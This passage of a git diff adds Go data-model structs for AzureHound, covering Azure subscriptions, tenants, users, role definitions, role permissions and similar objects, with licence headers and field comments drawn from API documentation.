`json:"authorizationSource,omitempty"` + + // The subscription display name. + DisplayName string `json:"displayName,omitempty"` + + // A list of tenants managing the subscription. + ManagedByTenants []ManagedByTenant `json:"managedByTenants,omitempty"` + + // The subscription state. + State enums.SubscriptionState `json:"state,omitempty"` + + // The subscription ID. + SubscriptionId string `json:"subscriptionId,omitempty"` + + // The subscription policies. + SubscriptionPolicies SubscriptionPolicies `json:"subscriptionPolicies,omitempty"` + + // The tags attached to the subscription. + Tags map[string]string `json:"tags,omitempty"` + + // The subscription tenant ID. + TenantId string `json:"tenantId,omitempty"` +} diff --git a/models/azure/subscription_policies.go b/models/azure/subscription_policies.go new file mode 100644 index 0000000..dec658f --- /dev/null +++ b/models/azure/subscription_policies.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// Subscription Policies +type SubscriptionPolicies struct { + // The subscription location placement ID. The ID indicates which regions are visible for a subscription. + // For example, a subscription with a location placement Id of Public_2014-09-01 has access to Azure public regions. + LocationPlacementId string `json:"locationPlacementId,omitempty"` + + // The subscription quota ID. + QuotaId string `json:"quotaId,omitempty"` + + // The subscription spending limit. + SpendingLimit enums.SpendingLimit `json:"spendingLimit,omitempty"` +} diff --git a/models/azure/tenant.go b/models/azure/tenant.go new file mode 100644 index 0000000..727e0c5 --- /dev/null +++ b/models/azure/tenant.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type Tenant struct { + Country string `json:"country,omitempty"` // Country/region name of the address for the tenant. + CountryCode string `json:"countryCode,omitempty"` // Country/region abbreviation for the tenant. + DefaultDomain string `json:"defaultDomain,omitempty"` // The default domain for the tenant. + DisplayName string `json:"displayName,omitempty"` // The display name of the tenant. + Domains []string `json:"domains,omitempty"` // The list of domains for the tenant + Id string `json:"id,omitempty"` // The fully qualified ID of the tenant. E.g. "/tenants/00000000-0000-0000-0000-000000000000" + TenantBrandingLogoUrl string `json:"tenantBrandingLogoUrl,omitempty"` // The tenant's branding logo URL. Only available for 'Home' TenantCategory + TenantCategory enums.TenantCategory `json:"tenantCategory,omitempty"` // The category of the tenant. + TenantId string `json:"tenantId,omitempty"` // Then tenant ID. E.g. "00000000-0000-0000-0000-000000000000" + TenantType string `json:"tenantType,omitempty"` // The tenant type. Only available for 'Home' TenantCategory +} + +type TenantList struct { + NextLink string `json:"nextLink,omitempty"` // The URL to use for getting the next set of values. + Value []Tenant `json:"value"` // A list of tenants. +} diff --git a/models/azure/terminate_notification_profile.go b/models/azure/terminate_notification_profile.go new file mode 100644 index 0000000..900d4b1 --- /dev/null +++ b/models/azure/terminate_notification_profile.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type TerminateNotificationProfile struct { + // Specifies whether the Terminate Scheduled event is enabled or disabled. + Enable bool `json:"enable,omitempty"` + + // Configurable length of time a Virtual Machine being deleted will have to potentially approve the + // Terminate Scheduled Event before the event is auto approved (timed out). + // The configuration must be specified in ISO 8601 format, the default value is 5 minutes (PT5M) + NotBeforeTimeout string `json:"notBeforeTimeout,omitempty"` +} diff --git a/models/azure/timezone_base.go b/models/azure/timezone_base.go new file mode 100644 index 0000000..69019ef --- /dev/null +++ b/models/azure/timezone_base.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type TimeZoneBase struct { + // The name of the time zone. + Name string `json:"name,omitempty"` +} diff --git a/models/azure/uefi_settings.go b/models/azure/uefi_settings.go new file mode 100644 index 0000000..6d00da0 --- /dev/null +++ b/models/azure/uefi_settings.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the security settings like secure boot and vTPM used while creating the virtual machine. +// Minimum api-version: 2020-12-01 +type UefiSettings struct { + // Specifies whether secure boot should be enabled on the virtual machine. + SecureBootEnabled bool `json:"secureBootEnabled,omitempty"` + + // Specifies whether vTPM should be enabled on the virtual machine. + VTpmEnabled bool `json:"vTpmEnabled,omitempty"` +} diff --git a/models/azure/unified_role_assignment.go b/models/azure/unified_role_assignment.go new file mode 100644 index 0000000..fc60a5f --- /dev/null +++ b/models/azure/unified_role_assignment.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "encoding/json" + +type UnifiedRoleAssignment struct { + Entity + + // Identifier of the role definition the assignment is for. + // Read only. + // Supports $filer (eq, in). + RoleDefinitionId string `json:"roleDefinitionId,omitempty"` + + // Identifier of the principal to which the assignment is granted. + // Supports $filter (eq, in). + PrincipalId string `json:"principalId,omitempty"` + + // Identifier of the directory object representing the scope of the assignment. + // Either this property or appScopeId is required. + // The scope of an assignment determines the set of resources for which the principal has been granted access. + // Directory scopes are shared scopes stored in the directory that are understood by multiple applications. + // + // Use / for tenant-wide scope. + // Use appScopeId to limit the scope to an application only. + // + // Supports $filter (eq, in). + DirectoryScopeId string `json:"directoryScopeId,omitempty"` + + // Identifier of the resource representing the scope of the assignment. + ResourceScope string `json:"resourceScope,omitempty"` + + // Identifier of the app-specific scope when the assignment scope is app-specific. + // Either this property or directoryScopeId is required. + // App scopes are scopes that are defined and understood by this application only. + // + // Use / for tenant-wide app scopes. + // Use directoryScopeId to limit the scope to particular directory objects, for example, administrative units. + // + // Supports $filter (eq, in). + AppScopeId string `json:"appScopeId,omitempty"` + + // Referencing the assigned principal. + // Read-only. + // Supports $expand. + Principal json.RawMessage `json:"principal,omitempty"` + + // The roleDefinition the assignment is for. + // Supports $expand. roleDefinition.Id will be auto expanded. + RoleDefinition UnifiedRoleDefinition `json:"roleDefinition,omitempty"` + + // The directory object that is the scope of the assignment. + // Read-only. + // Supports $expand. + DirectoryScope Application `json:"directoryScope,omitempty"` + + // Read-only property with details of the app specific scope when the assignment scope is app specific. + // Containment entity. + // Supports $expand. + AppScope AppScope `json:"appScope,omitempty"` +} diff --git a/models/azure/unified_role_definition.go b/models/azure/unified_role_definition.go new file mode 100644 index 0000000..1f12ec4 --- /dev/null +++ b/models/azure/unified_role_definition.go @@ -0,0 +1,62 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type UnifiedRoleDefinition struct { + Entity + + // The description for the unifiedRoleDefinition. + // Read-only when isBuiltIn is true. + Description string `json:"description,omitempty"` + + // The display name for the unifiedRoleDefinition. + // Read-only when isBuiltIn is true. + // Required. + // Supports $filter (eq, in). + DisplayName string `json:"displayName,omitempty"` + + // Flag indicating whether the role definition is part of the default set included in + // Azure Active Directory (Azure AD) or a custom definition. + // Read-only. + // Supports $filter (eq, in). + IsBuiltIn bool `json:"isBuiltIn,omitempty"` + + // Flag indicating whether the role is enabled for assignment. + // If false the role is not available for assignment. + // Read-only when isBuiltIn is true. + IsEnabled bool `json:"isEnabled,omitempty"` + + // List of the scopes or permissions the role definition applies to. + // Currently only / is supported. + // Read-only when isBuiltIn is true. + // DO NOT USE. This will be deprecated soon. Attach scope to role assignment. + ResourceScopes []string `json:"resourceScopes,omitempty"` + + // List of permissions included in the role. + // Read-only when isBuiltIn is true. + // Required. + RolePermisions []UnifiedRolePermission `json:"rolePermisions,omitempty"` + + // Custom template identifier that can be set when isBuiltIn is false but is read-only when isBuiltIn is true. + // This identifier is typically used if one needs an identifier to be the same across different directories. + TemplateId string `json:"templateId,omitempty"` + + // Indicates version of the role definition. + // Read-only when isBuiltIn is true. + Version string `json:"version,omitempty"` +} diff --git a/models/azure/unified_role_permission.go b/models/azure/unified_role_permission.go new file mode 100644 index 0000000..c60b1e9 --- /dev/null +++ b/models/azure/unified_role_permission.go @@ -0,0 +1,71 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents a collection of allowed resource actions and the conditions that must be met for the action to be allowed. +// Resource actions are tasks that can be performed on a resource. For example, an application resource may support +// create, update, delete, and reset password actions. +type UnifiedRolePermission struct { + // Set of tasks that can be performed on a resource. + // Required. + // + // The following is the schema for resource actions: + // /// + // + // For example: microsoft.directory/applications/credentials/update. + // + // * Namespace - The services that exposes the task. For example, all tasks in Azure Active Directory use the namespace microsoft.directory. + // * Entity - The logical features or components exposed by the service in Microsoft Graph. For example, applications, servicePrincipals, or groups. + // * PropertySet - The specific properties or aspects of the entity for which access is being granted. For example, microsoft.directory/applications/authentication/read grants the ability to read the reply URL, logout URL, and implicit flow property on the application object in Azure AD. The following are reserved names for common property sets: + // * allProperties - Designates all properties of the entity, including privileged properties. Examples include microsoft.directory/applications/allProperties/read and microsoft.directory/applications/allProperties/update. + // * basic - Designates common read properties but excludes privileged ones. For example, microsoft.directory/applications/basic/update includes the ability to update standard properties like display name. + // * standard - Designates common update properties but excludes privileged ones. For example, microsoft.directory/applications/standard/read. + // * Actions - The operations being granted. In most circumstances, permissions should be expressed in terms of CRUD or allTasks. Actions include: + // * Create - The ability to create a new instance of the entity. + // * Read - The ability to read a given property set (including allProperties). + // * Update - The ability to update a given property set (including allProperties). + // * Delete - The ability to delete a given entity. + // * AllTasks - Represents all CRUD operations (create, read, update, and delete). + AllowedResourceActions []string `json:"allowedResourceActions,omitempty"` + + // Optional constraints that must be met for the permission to be effective. + // + // Conditions define constraints that must be met. For example, a requirement that the principal be an owner of the + // target resource. The following are the supported conditions: + // + // Self: "@Subject.objectId == @Resource.objectId" + // Owner: "@Subject.objectId Any_of @Resource.owners" + // + // The following is an example of a role permission with a condition that the principal be the owner of the target + // resource: + // + // "rolePermissions": [ + // { + // "allowedResourceActions": [ + // "microsoft.directory/applications/basic/update", + // "microsoft.directory/applications/credentials/update" + // ], + // "condition": "@Subject.objectId Any_of @Resource.owners" + // } + // ] + Condition string `json:"condition,omitempty"` + + // Set of tasks tat may not be performed on a resource. Not yet supported. + // See AllowedResourceActions for more information. + ExcludedResourceActions []string `json:"excludedResourceActions,omitempty"` +} diff --git a/models/azure/user.go b/models/azure/user.go new file mode 100644 index 0000000..301b5d7 --- /dev/null +++ b/models/azure/user.go @@ -0,0 +1,467 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents an Azure Active Directory user account. +type User struct { + DirectoryObject + + // A freeform text entry field for the user to describe themselves. + // + // Returned only on `$select` + AboutMe string `json:"aboutMe,omitempty"` + + // `true` if the account is enabled; otherwise `false`. This property is required when a user is created. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + AccountEnabled bool `json:"accountEnabled,omitempty"` + + // Sets the age group of the user. + // + // Allowed values: `null`, `minor`, `notAdult` and `adult` + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + AgeGroup enums.AgeGroup `json:"ageGroup,omitempty"` + + // The licenses that are assigned to the user, including inherited (group-based) licenses. + // + // Not nullable + // Returned only on `$select` + // Supports `$filter` (eq, NOT) + AssignedLicenses []AssignedLicense `json:"assignedLicenses,omitempty"` + + // The plans that are assigned to the user. + // + // Read-Only + // Not Nullable + // Returned only on `$select` + // Supports `$filter` (eq, NOT) + AssignedPlans []AssignedPlan `json:"assignedPlans,omitempty"` + + // The birthday of the user using ISO 8601 format. + // + // Returned only on `$select` + Birthday string `json:"birthday,omitempty"` + + // The telephone numbers for the user. + // Note: Although this is a string collection, only one number can be set for this property. + // + // Read-only for users synced from on-premises directory + // Supports `$filter` (eq, NOT) + BusinessPhones []string `json:"businessPhones,omitempty"` + + // The city in which the user is located. + // + // Max length is 128 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + City string `json:"city,omitempty"` + + // The company name which the user is associated. Useful for describing a company for an external user. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + CompanyName string `json:"companyName,omitempty"` + + // Sets whether conset has been obtained for minors. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ConsentProvidedForMinor enums.ConsentForMinor `json:"consentProvidedForMinor,omitempty"` + + // The country/region in which the user is located. + // + // Max length is 128 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + Country string `json:"country,omitempty"` + + // The created date of the user object. + // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // Indicates the method through which the user account was created. + // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + CreationType enums.CreationType `json:"creationType,omitempty"` + + // The date and time the user was deleted. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // The name for the department in which the user works. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + Department string `json:"department,omitempty"` + + // The name displayed in the address book for the user. This is usually the combination of the user's first name, + // middle initial and last name. Required on creation and cannot be cleared during updates. + // + // Max length is 256 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith), `$orderBy` and `$search` + DisplayName string `json:"displayName,omitempty"` + + // The data and time the user was hired or will start work in case of a future hire. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + EmployeeHireDate string `json:"employeeHireDate,omitempty"` + + // The employee identifier assigned to the user bu the organization. + // + // Returned only on `$select` + // Supports `filter` (eq,ne,NOT,ge,le,in,startsWith) + EmployeeId string `json:"employeeId,omitempty"` + + // Represents organization data (e.g. division and costCenter) associated with a user. + // + // Returned only in `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + EmployeeOrgData EmployeeOrgData `json:"employeeOrgData,omitempty"` + + // Captures enterprise worker type. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + EmployeeType string `json:"employeeType,omitempty"` + + // For an external user invited to the tenant, this represents the invited user's invitation status. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ExternalUserState enums.ExternalUserState `json:"externalUserState,omitempty"` + + // Shows the timestamp for the latest change to the {@link ExternalUserState} property. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ExternalUserStateChangeDateTime string `json:"externalUserStateChangeDateTime,omitempty"` + + // The fax number of the user. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + FaxNumber string `json:"faxNumber,omitempty"` + + // The given name (first name) of the user. + // + // Max length is 64 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + GivenName string `json:"givenName,omitempty"` + + // The hire date of the user using ISO 8601 format. + // Note: This property is specific to SharePoint Online. Use {@link EmployeeHireDate} to set or update. + // + // Returned only on `$select` + HireDate string `json:"hireDate,omitempty"` + + // Represents the identities that can be used to sign in to this user account. + // + // Returned only on `$select` + // Supports `$filter` (eq) only where the SignInType is not `userPrincipalName` + Identities []ObjectIdentity `json:"identities,omitempty"` + + // The instant message voice over IP (VOIP) session initiation protocol (SIP) addresses for this user. + // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,startsWith) + ImAddresses []string `json:"imAddresses,omitempty"` + + // A list for the user to describe their interests. + // + // Returned only on `$select` + Interests []string `json:"interests,omitempty"` + + // The user's job title. + // + // Max length is 128 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + JobTitle string `json:"jobTitle,omitempty"` + + // The time when this Azure AD user last changed their password or when their password was created using ISO 8601 + // format in UTC time. + // + // Returned only on `$select` + LastPasswordChangeDateTime string `json:"lastPasswordChangeDateTime,omitempty"` + + // Used by enterprise applications to determine the legal age group of the user. + // + // Returned only on `$select` + LegalAgeGroupClassification enums.LegalAgeGroup `json:"legalAgeGroupClassification,omitempty"` + + // State of license assignments for this user. + // + // Read-only + // Returned only on `$select` + LicenseAssignmentStates []LicenseAssignmentState `json:"licenseAssignmentStates,omitempty"` + + // The SMTP address for the user. + // + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith,endsWith) + Mail string `json:"mail,omitempty"` + + // Settings for the primary mailbox of the signed-in user. + // + // Returned only on `$select` + MailboxSettings MailboxSettings `json:"mailboxSettings,omitempty"` + + // The mail alias for the user. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + MailNickname string `json:"mailNickname,omitempty"` + + // The primary cellular telephone number for the user. Read-only for users synced from on-premises directory. + // Maximum length is 64 characters. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + MobilePhone string `json:"mobilePhone,omitempty"` + + // The URL for the user's personal site. + // Returned only on $select. + MySite string `json:"mySite,omitempty"` + + // The office location in the user's place of business. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + OfficeLocation string `json:"officeLocation,omitempty"` + + // Contains the on-premises Active Directory distinguished name or DN. The property is only populated for customers + // who are synchronizing their on-premises directory to Azure Active Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + OnPremisesDistinguishedName string `json:"onPremisesDistinguishedName,omitempty"` + + // Contains the on-premises domainFQDN, also called dnsDomainName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + OnPremisesDomainName string `json:"onPremisesDomainName,omitempty"` + + // Contains extensionAttributes 1-15 for the user + // Note that the individual extension attributes are neither selectable nor filterable. + // For an onPremisesSyncEnabled user, the source of authority for this set of properties is the on-premises and is + // read-only. + // For a cloud-only user (where onPremisesSyncEnabled is false), these properties may be set during creation or + // update. These extension attributes are also known as Exchange custom attributes 1-15. + // Returned only on $select. Supports $filter (eq, NOT, ge, le, in). + OnPremisesExtensionAttributes OnPremisesExtensionAttributes `json:"onPremisesExtensionAttributes,omitempty"` + + // This property is used to associate an on-premises Active Directory user account to their Azure AD user object. + // This property must be specified when creating a new user account in the Graph if you are using a federated domain + // for the user's userPrincipalName (UPN) property. + // NOTE: The $ and _ characters cannot be used when specifying this property. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in) + OnPremisesImmutableId string `json:"onPremisesImmutableId,omitempty"` + + // Indicates the last time at which the object was synced with the on-premises directory; + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in). + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // Errors when using Microsoft synchronization product during provisioning. + // Returned only on $select. Supports $filter (eq, NOT, ge, le). + OnPremisesProvisioningErrors []OnPremisesProvisioningError `json:"onPremisesProvisioningErrors,omitempty"` + + // Contains the on-premises samAccountName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + OnPremisesSamAccountName string `json:"onPremisesSamAccountName,omitempty"` + + // Contains the on-premises security identifier (SID) for the user that was synchronized from on-premises to the + // cloud. + // Read-only. + // Returned only on $select. + OnPremisesSecurityIdentifier string `json:"onPremisesSecurityIdentifier,omitempty"` + + // true if this object is synced from an on-premises directory; false if this object was originally synced from an + // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises + // directory (default). + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"` + + // Contains the on-premises userPrincipalName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + OnPremisesUserPrincipalName string `json:"onPremisesUserPrincipalName,omitempty"` + + // A list of additional email addresses for the user; for example: ["bob@contoso.com", "Robert@fabrikam.com"]. + // NOTE: This property cannot contain accent characters. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le, in, startsWith). + OtherMails []string `json:"otherMails,omitempty"` + + // Specifies password policies for the user. This value is an enumeration with one possible value being + // DisableStrongPassword, which allows weaker passwords than the default policy to be specified. + // DisablePasswordExpiration can also be specified. + // The two may be specified together; for example: DisablePasswordExpiration, DisableStrongPassword. + // Returned only on $select. + // Supports $filter (ne, NOT). + PasswordPolicies string `json:"passwordPolicies,omitempty"` + + // Specifies the password profile for the user. + // The profile contains the user’s password. This property is required when a user is created. The password in the + // profile must satisfy minimum requirements as specified by the passwordPolicies property. By default, a strong + // password is required. + // + // NOTE: For Azure B2C tenants, the forceChangePasswordNextSignIn property should be set to false and instead use + // custom policies and user flows to force password reset at first logon. See Force password reset at first logon. + // + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + PasswordProfile PasswordProfile `json:"passwordProfile,omitempty"` + + // A list for the user to enumerate their past projects. + // Returned only on $select. + PastProjects []string `json:"pastProjects,omitempty"` + + // The postal code for the user's postal address. The postal code is specific to the user's country/region. In the + // United States of America, this attribute contains the ZIP code. + // Maximum length is 40 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + PostalCode string `json:"postalCode,omitempty"` + + // The preferred data location for the user. + PreferredDataLocation string `json:"preferredDataLocation,omitempty"` + + // The preferred language for the user. Should follow ISO 639-1 Code; for example en-US. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith) + PreferredName string `json:"preferredName,omitempty"` + + // The plans that are provisioned for the user. + // Read-only. + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le). + ProvisionedPlans []ProvisionedPlan `json:"provisionedPlans,omitempty"` + + // For example: ["SMTP: bob@contoso.com", "smtp: bob@sales.contoso.com"]. + // For Azure AD B2C accounts, this property has a limit of ten unique addresses. + // Read-only, + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le, startsWith). + ProxyAddresses []string `json:"proxyAddresses,omitempty"` + + // Any refresh tokens or sessions tokens (session cookies) issued before this time are invalid, and applications + // will get an error when using an invalid refresh or sessions token to acquire a delegated access token (to access + // APIs such as Microsoft Graph). If this happens, the application will need to acquire a new refresh token by + // making a request to the authorize endpoint. + // Returned only on $select. + // Read-only. + RefreshTokensValidFromDateTime string `json:"refreshTokensValidFromDateTime,omitempty"` + + // A list for the user to enumerate their responsibilities. + // Returned only on $select + Responsibilities []string `json:"responsibilities,omitempty"` + + // A list for the user to enumerate the schools they have attended. + // Returned only on $select. + Schools []string `json:"schools,omitempty"` + + // true if the Outlook global address list should contain this user, otherwise false. If not set, this will be + // treated as true. For users invited through the invitation manager, this property will be set to false. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + ShowInAddressList bool `json:"showInAddressList,omitempty"` + + // A list for the user to enumerate their skills. + // Returned only on $select. + Skills []string `json:"skills,omitempty"` + + // Any refresh tokens or sessions tokens (session cookies) issued before this time are invalid, and applications + // will get an error when using an invalid refresh or sessions token to acquire a delegated access token (to access + // APIs such as Microsoft Graph). If this happens, the application will need to acquire a new refresh token by + // making a request to the authorize endpoint. + // Read-only. + // Returned only on $select. + SignInSessionsValidFromDateTime string `json:"signInSessionsValidFromDateTime,omitempty"` + + // The state or province in the user's address. + // Maximum length is 128 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + State string `json:"state,omitempty"` + + // The street address of the user's place of business. + // Maximum length is 1024 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + StreetAddress string `json:"streetAddress,omitempty"` + + // The user's surname (family name or last name). Maximum length is 64 characters. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + Surname string `json:"surname,omitempty"` + + // A two letter country code (ISO standard 3166). Required for users that will be assigned licenses due to legal + // requirement to check for availability of services in countries. Examples include: US, JP, and GB. + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + UsageLocation string `json:"usageLocation,omitempty"` + + // The user principal name (UPN) of the user. + // The UPN is an Internet-style login name for the user based on the Internet standard RFC 822. By convention, this + // should map to the user's email name. The general format is alias@domain, where domain must be present in the + // tenant's collection of verified domains. This property is required when a user is created. The verified domains + // for the tenant can be accessed from the verifiedDomains property of organization. + // + // NOTE: This property cannot contain accent characters. + // + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith, endsWith) and $orderBy. + UserPrincipalName string `json:"userPrincipalName,omitempty"` + + // A string value that can be used to classify user types in your directory, such as Member and Guest. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + UserType string `json:"userType,omitempty"` +} diff --git a/models/azure/user_assigned_identity.go b/models/azure/user_assigned_identity.go new file mode 100644 index 0000000..2439cf4 --- /dev/null +++ b/models/azure/user_assigned_identity.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type UserAssignedIdentity struct { + ClientId string `json:"clientId,omitempty"` + PrincipalId string `json:"principalId,omitempty"` +} diff --git a/models/azure/vault_certificate.go b/models/azure/vault_certificate.go new file mode 100644 index 0000000..41c9124 --- /dev/null +++ 